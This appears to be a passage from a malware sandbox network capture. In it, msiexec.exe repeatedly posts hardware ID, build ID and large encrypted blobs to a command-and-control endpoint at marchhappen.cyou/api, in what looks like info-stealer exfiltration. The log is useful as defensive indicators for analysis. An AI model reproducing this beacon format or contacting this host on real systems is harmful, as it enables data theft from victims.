2024-11-24 09:15:47 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CNTWP1O0SX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18117 Host: marchhappen.cyou
2024-11-24 09:15:47 UTC	15331	OUT	Data Raw: 2d 2d 43 4e 54 57 50 31 4f 30 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 43 4e 54 57 50 31 4f 30 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 4e 54 57 50 31 4f 30 53 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 43 4e 54 57 50 31 4f 30 53 58 0d 0a 43 6f 6e 74 65 6e Data Ascii: --CNTWP1O0SXContent-Disposition: form-data; name="hwid"6AD044EF56C8681023A7FDDC95B3C36A--CNTWP1O0SXContent-Disposition: form-data; name="pid"2--CNTWP1O0SXContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--CNTWP1O0SXConten
2024-11-24 09:15:47 UTC	2786	OUT	Data Raw: 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-11-24 09:15:48 UTC	1014	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tv2t1v23jdnv1l3cnbh45debo0; expires=Thu, 20-Mar-2025 03:02:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX7g4dDl2Jdr%2B8ygZXslnBI9QGL6zui9jKCkkGbssO1Gs3r2UfU%2FM9Rnf85Cy3CxYbWL9LNZ6BRTNsbkdsmit6FcfWqcOfbtIBMFykGNOY1K%2FDTEzMIYhuqx%2BiR1LXsjqkY3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784be9b8d641f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=18&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19071&delivery_rate=1834170&cwnd=220&unsent_bytes=0&cid=2e6052c0a02dc817&ts=1011&x=0"
2024-11-24 09:15:48 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 09:15:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:50 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F6Z64DGUIPK91TNFC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8780 Host: marchhappen.cyou
2024-11-24 09:15:50 UTC	8780	OUT	Data Raw: 2d 2d 46 36 5a 36 34 44 47 55 49 50 4b 39 31 54 4e 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 46 36 5a 36 34 44 47 55 49 50 4b 39 31 54 4e 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 36 5a 36 34 44 47 55 49 50 4b 39 31 54 4e 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d Data Ascii: --F6Z64DGUIPK91TNFCContent-Disposition: form-data; name="hwid"6AD044EF56C8681023A7FDDC95B3C36A--F6Z64DGUIPK91TNFCContent-Disposition: form-data; name="pid"2--F6Z64DGUIPK91TNFCContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06
2024-11-24 09:15:51 UTC	1018	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tm6k5tt68pu1njh6jffntskgvi; expires=Thu, 20-Mar-2025 03:02:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbturM33jhEj87hY%2Bvxi%2Fa6JDDEwCWncJ8Svc%2FQDUvCrz1Zxp8A7JKVbDhhfG8%2BmFek6mrPXEOxnd2jzlqvv0TdN1Sl2nTG17jHpZ2hEgl%2Br%2BihvMdt4%2BzBkpFLb0X5gYQE9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784bfaada37cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9718&delivery_rate=1505930&cwnd=205&unsent_bytes=0&cid=f0bb56203000e765&ts=903&x=0"
2024-11-24 09:15:51 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 09:15:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:53 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VETBWDRWO0PA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20403 Host: marchhappen.cyou
2024-11-24 09:15:53 UTC	15331	OUT	Data Raw: 2d 2d 56 45 54 42 57 44 52 57 4f 30 50 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 56 45 54 42 57 44 52 57 4f 30 50 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 45 54 42 57 44 52 57 4f 30 50 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 56 45 54 42 57 44 52 57 4f 30 50 41 Data Ascii: --VETBWDRWO0PAContent-Disposition: form-data; name="hwid"6AD044EF56C8681023A7FDDC95B3C36A--VETBWDRWO0PAContent-Disposition: form-data; name="pid"3--VETBWDRWO0PAContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--VETBWDRWO0PA
2024-11-24 09:15:53 UTC	5072	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-11-24 09:15:54 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ptff389nm98spb7h66pju403sn; expires=Thu, 20-Mar-2025 03:02:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0UlXOPWmLv0qpMaxrQP4LWmW2H8hBjaNvP3FeUppGufbwR2x2tyU2CmsdqOw5GyIb88%2FAChnLyt25Ruxlmnr64H7%2F5wOysA2jGu%2FUIkWRazvnh6FB%2FF8pQ%2Frl2pWbCoPoYU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784c0a9f8a7c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=19&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21359&delivery_rate=1577525&cwnd=207&unsent_bytes=0&cid=fd3fe8eb0f2545d2&ts=940&x=0"
2024-11-24 09:15:54 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 09:15:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:56 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6LWN9OV9M0DIVFR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1237 Host: marchhappen.cyou
2024-11-24 09:15:56 UTC	1237	OUT	Data Raw: 2d 2d 36 4c 57 4e 39 4f 56 39 4d 30 44 49 56 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 36 4c 57 4e 39 4f 56 39 4d 30 44 49 56 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4c 57 4e 39 4f 56 39 4d 30 44 49 56 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 36 4c 57 Data Ascii: --6LWN9OV9M0DIVFRContent-Disposition: form-data; name="hwid"6AD044EF56C8681023A7FDDC95B3C36A--6LWN9OV9M0DIVFRContent-Disposition: form-data; name="pid"1--6LWN9OV9M0DIVFRContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--6LW
2024-11-24 09:15:56 UTC	1006	IN	HTTP/1.1 200 OK Date: Sun, 24 Nov 2024 09:15:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bccleitp6vkcjts8m1cl41tb30; expires=Thu, 20-Mar-2025 03:02:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWfTmX0F21h1XTiJpizIxVqYE00N8ukmSa%2BFE2siUKnhF0pG7Yz%2FuUZPl6QFMEVKQ6VMERuwwh0ive1CfSaNFkSEZqygeJ3edc8PITmHGuOfL6M78MNoAlrSGIci5eQg6GEr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e784c1c3df67d05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1919&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2151&delivery_rate=1480730&cwnd=188&unsent_bytes=0&cid=4ebcfb2ed1d92506&ts=727&x=0"
2024-11-24 09:15:56 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-24 09:15:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	172.67.129.193	443	2044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-24 09:15:58 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IFQ4S6910VJOCVB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 161189 Host: marchhappen.cyou
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: 2d 2d 49 46 51 34 53 36 39 31 30 56 4a 4f 43 56 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 44 30 34 34 45 46 35 36 43 38 36 38 31 30 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 49 46 51 34 53 36 39 31 30 56 4a 4f 43 56 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 46 51 34 53 36 39 31 30 56 4a 4f 43 56 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 49 46 51 Data Ascii: --IFQ4S6910VJOCVBContent-Disposition: form-data; name="hwid"6AD044EF56C8681023A7FDDC95B3C36A--IFQ4S6910VJOCVBContent-Disposition: form-data; name="pid"1--IFQ4S6910VJOCVBContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--IFQ
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: 8e 03 87 95 b9 85 22 70 6d c9 0e 59 36 50 8a 4e a0 69 05 92 45 10 78 db 20 10 1a e6 fd 25 42 b1 d5 d2 82 32 0d 24 2f 7c 6e fb ca 5e 7f dc 1e d2 c7 c8 de 7d ce ff 47 b2 2c e6 31 f2 e0 cb 6d 92 0f 32 10 5c 73 95 af d9 bf c1 98 58 b5 8b 18 20 e6 a2 c3 98 68 67 57 9f dd 99 e4 e3 89 81 42 a2 c2 b6 5d 7b 12 c2 f9 f2 f8 86 65 77 5e fc cb ae 99 56 d6 e9 08 ca 60 01 07 23 61 29 02 0b 63 d1 40 ae 36 c0 b2 3b 1c 91 ed 77 bd 30 b3 5f aa ec 1b 28 b0 3f 40 72 d0 5f a3 e7 37 5b 14 61 ae cb 13 bd 41 47 98 46 26 8c 2f 0b 96 3a 7b 31 44 5c 80 e4 a7 b3 06 00 ce 81 ae 55 d5 0a 8d 76 2e 1f 18 e1 a0 ee 44 f2 33 31 75 b2 38 fc 5c d7 81 62 3e 20 f6 4f 9d 9f 4f c1 57 b0 80 1b 7f cb 4b f1 86 95 6f 3d ad 59 ed 9b 55 75 0b c7 ef 33 fc 8a b8 5f 4e b7 d7 df 1f e2 f2 57 6a 1a 82 e9 43 Data Ascii: "pmY6PNiEx %B2$/\|n^}G,1m2\sX hgWB]{ew^V`#a)c@6;w0_(?@r_7[aAGF&/:{1D\Uv.D31u8\b> OOWKo=YUu3_NWjC
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: d7 cd 5f ea a5 be 5a b1 3a 95 b5 eb 90 10 84 1f fb f2 71 62 45 62 c0 59 7d 55 db 3e 69 97 e5 09 7d c2 e0 af f7 9f bb 0f 83 83 5f 25 4d 67 a9 0d bc 15 ec 87 36 a7 95 b3 5a fd 9b 76 87 72 c3 15 9d 59 7e 5b c5 dc af d1 29 b9 32 61 9e f4 02 0f 3d e6 94 b9 79 95 05 4d 64 bc d7 e8 a7 e7 4f f4 a2 15 28 44 38 22 40 2a b5 b8 27 60 1b 20 2d 74 15 3f fc 77 75 f0 f6 8a 4e 6e d1 b0 3a 67 7e ce c1 ad fc c0 bd 97 eb b2 47 91 e4 e3 65 56 b6 bd 78 82 3d 62 64 94 b1 ab dc 78 bc eb e7 e3 7e a7 cb 57 73 d7 05 87 18 24 72 cd d4 cb 02 f5 8f 6b de 96 a7 f1 96 3f b0 29 49 3a f0 da 7f f9 37 c6 5c fa 35 1c 6e a6 0f a7 b5 52 59 9d 0b 23 07 57 df fb a5 5c 1d 72 e8 37 bd 77 bd c1 53 d3 e9 b8 64 ff 80 2f 5f da 7c 8d e7 1c 24 21 dc 78 92 76 73 f8 c3 83 13 23 f7 b9 9e 6c 17 6d e2 70 99 Data Ascii: _Z:qbEbY}U>i}_%Mg6ZvrY~[)2a=yMdO(D8"@*'` -t?wuNn:g~GeVx=bdx~Ws$rk?)I:7\5nRY#W\r7wSd/_\|$!xvs#lmp
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: ab 08 99 89 0d 92 f0 18 0d a5 3f ab 24 79 48 81 61 27 03 10 b4 c6 cf d8 fa 94 fe f9 da a3 9e ee fb 0a 0b f4 30 08 0f c0 41 0e 58 1e a1 3a 09 3f 1c e4 0d 30 f2 a1 2d 80 7f d7 27 8e 01 62 ba 3e ad 38 44 7c be 84 f9 c0 d7 6b 7d 21 b2 05 78 87 fb c2 a3 22 9d 4c fd f8 ba ee a7 c9 c5 4c 19 d8 c3 22 25 32 2c 3d 70 f1 9f c9 b5 54 02 e8 11 eb 96 d1 40 ff c7 27 9f b5 01 31 5e 20 96 da ff 61 ee dd 13 b2 a2 9b de 47 1d c0 9b 7f 66 96 bb 8c 1b b0 a4 33 f5 f1 40 00 82 bb f7 15 9e 1e 20 aa 8c 3c 57 9b a3 48 81 bf 97 34 8c fd e9 30 3d ac 64 aa fd 0a ff f3 d7 52 04 69 d3 f8 12 62 2d 8f 20 cf 9e bd 37 91 b7 c0 de 28 f2 f3 bb dd 2c ff 9b 99 3c 4e 90 24 48 4b c2 1f fd 69 cf 68 ee 7d e9 d5 b6 23 44 6d 55 8f 9f 37 52 10 48 7a 42 62 b9 00 65 f8 67 9c 54 a2 30 06 c8 4c b0 97 c0 Data Ascii: ?$yHa'0AX:?0-'b>8D\|k}!x"LL"%2,=pT@'1^ aGf3@ <WH40=dRib- 7(,<N$HKih}#DmU7RHzBbegT0L
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: 37 0b cf 53 f2 0e 50 10 ff 9f 79 d9 3b 6f 8e ce 79 d9 59 71 a2 b7 46 de e1 83 97 ef be 74 31 26 99 f4 b3 13 95 cc 1a a7 2c 12 14 d4 05 56 8c 92 17 89 df 4e 76 58 85 f3 02 2f a6 96 8f 53 0e 50 f3 18 5f 9b cb 2b 34 17 f1 7d 10 83 9e 60 fa cf c3 ad 2c 12 6c 50 fc c7 2d 7b 42 f5 20 69 05 13 78 23 bc f0 a8 fb 0a 49 16 40 ca 25 48 1a 0a ef b2 c3 90 33 c6 f3 45 ba 1b 09 31 07 31 d0 42 64 10 48 00 f3 6f 56 2c 5f eb 37 a9 9c af 87 08 1e 49 a6 e3 a8 dd 9e 3f f0 ab 1a d7 4a 9f 3f dd d3 c1 ef fc 7b bf 7e ce 35 61 0e 20 02 b9 47 6c 5e 13 75 f7 61 e5 7d 90 37 75 b9 48 39 86 3f 2a 49 b2 fd 5d 1b 42 4f 5e 2f 6d 9f 33 a6 9f 09 37 82 f5 5c 00 92 8b 66 89 d0 68 fc c0 fc fd 70 7e 2a 37 88 36 e7 97 1d 32 48 cf 06 ce e4 1b 87 9e ff 0c f1 29 7f 99 15 c4 5d 0d e7 dd e3 05 a1 0b Data Ascii: 7SPy;oyYqFt1&,VNvX/SP_+4}`,lP-{B ix#I@%H3E11BdHoV,_7I?J?{~5a Gl^ua}7uH9?I]BO^/m37\fhp~762H)]
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: ea 33 b0 d0 93 bc 10 96 84 af 0b 72 3c b8 f0 30 1e c0 f2 88 b3 63 4e c4 e6 91 5e 02 e3 c9 d9 a6 1b df fe 69 e2 84 e5 c1 e1 08 f3 82 df 89 e3 99 9c 97 57 44 9d 3c 0b 85 da 3a 8c a3 ab b7 fd 6d 2e 38 ff 47 b6 60 ba 7b 00 6a af 67 0f 40 ab bd 08 99 01 d9 5a cf eb 62 3d 52 2a 78 30 ba 92 ff ba 25 0f a8 a3 76 bf 94 b5 27 b7 63 20 19 ba af 70 fe ca be 4e 79 86 0d 16 49 17 bc 54 bf 72 92 04 14 5d fa fa e6 80 1f b3 9c af ae df 64 33 3e 89 e1 15 84 ad fe 87 65 af a9 b3 8a 17 d9 8d 6b a8 c8 fb ca 1d 23 31 25 5f d0 95 39 79 27 a2 e4 e1 db c8 fe 9f 26 b3 0a c7 7a 60 e6 23 29 0f ef 05 6f ff eb 7f 0d 96 bf 01 db a4 54 80 bb f9 ef ad 1b da 20 c7 c1 aa 4f 77 5e db 96 e1 08 56 8c 3c 68 3d 8c 2a 26 29 de 38 cc 23 84 fd cc 36 d9 bc d3 ee 27 e2 bc 63 af 29 f3 0d 28 6e 68 60 Data Ascii: 3r<0cN^iWD<:m.8G`{jg@Zb=Rx0%v'c pNyITr]d3>ek#1%_9y'&z`#)oT Ow^V<h=&)8#6'c)(nh`
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: 99 4a 5a 42 1a 84 ac 08 6c 45 ad 40 15 b4 52 0c f3 3e 1f c5 93 ae ef fe 9a f7 3d ba f7 02 bf e4 fd b6 fe 95 aa 6e 8a 9c 90 b0 6e 72 9c ac dd 28 d3 c2 f7 93 b6 34 e6 cb a1 8d ed 94 d7 31 56 3c ff f9 80 94 44 2d 75 e1 d3 a5 6e 29 e0 c4 02 20 38 01 a5 85 1c 48 8f f9 69 50 c0 a3 d7 12 dd fb 53 a8 ca d3 9d 69 21 be f3 a2 d2 b1 b9 98 cd 9e 9d 4d c9 52 d8 6a 6c ee 93 1a 9d d7 7e db 28 e9 e9 b9 6e ec 8f 9a 85 8b 4a 69 d7 26 7d 65 df 88 50 2a 1d 8a 2f af 8c 48 58 7e aa 88 79 7e df 44 1b 1c 4c 36 5f f1 da 2e 60 a6 0e b8 50 90 cf c3 ba 90 a1 7a d5 73 d1 d7 9b f0 10 66 ab 28 79 a9 20 28 aa b5 da 39 a7 ac c3 2f f2 6f f5 3c 44 e2 c6 6f 22 31 28 ef bc 90 9e 19 c8 2e 49 d1 24 52 c1 62 01 60 2e 52 49 08 8e 74 f5 57 8a 39 06 af d4 b9 27 79 78 b5 e0 2e 93 d1 5b c3 20 e7 48 Data Ascii: JZBlE@R>=nnr(41V<D-un) 8HiPSi!MRjl~(nJi&}eP*/HX~y~DL6_.`Pzsf(y (9/o<Do"1(.I$Rb`.RItW9'yx.[ H
2024-11-24 09:15:58 UTC	15331	OUT	Data Raw: ef 42 d0 3d 7a c4 05 ca 95 c5 14 44 3e 4b 6b c7 5e c0 65 dc 2d e9 59 d3 0d ab c5 b7 fc a9 4c a7 55 a1 e2 39 0b 05 d9 ec 39 e3 07 b9 f1 49 58 a4 a4 56 40 12 98 3d 56 7a f3 71 04 b6 bf 97 77 08 63 ea f5 e5 91 ef bf 51 7a 40 0b 61 2d f1 1a 9f f0 17 f0 3b 70 4c fb 2e b4 77 44 08 4e 90 1a c7 58 bb 28 2c 3d 71 e6 5f 42 0f 7d 2a 5d 62 43 f4 f1 37 5f 9f 35 7c 4c 15 4f 70 3f fd dc 24 45 eb e5 71 90 ca f6 9f f7 26 25 4e d1 27 9e 15 ab 86 0a ee df be bf 73 7c ca 44 59 a1 eb 52 2a ff fd f6 63 13 af 3b 9e 63 d4 33 42 de b1 fd e7 c0 80 df a9 99 06 f2 34 2a 27 2f 48 92 40 d6 e0 97 44 67 75 70 78 b3 06 a4 59 af ca 5b 56 a9 90 ff 67 74 e7 3e 11 17 12 17 e7 d9 59 4b d5 b9 bd 9b 4c f4 8a f0 55 e9 51 92 3f 9c d9 68 5d 94 28 18 ff 73 c2 02 c4 8a ae 33 ff 87 b5 40 9e f1 b5 b5 Data Ascii: 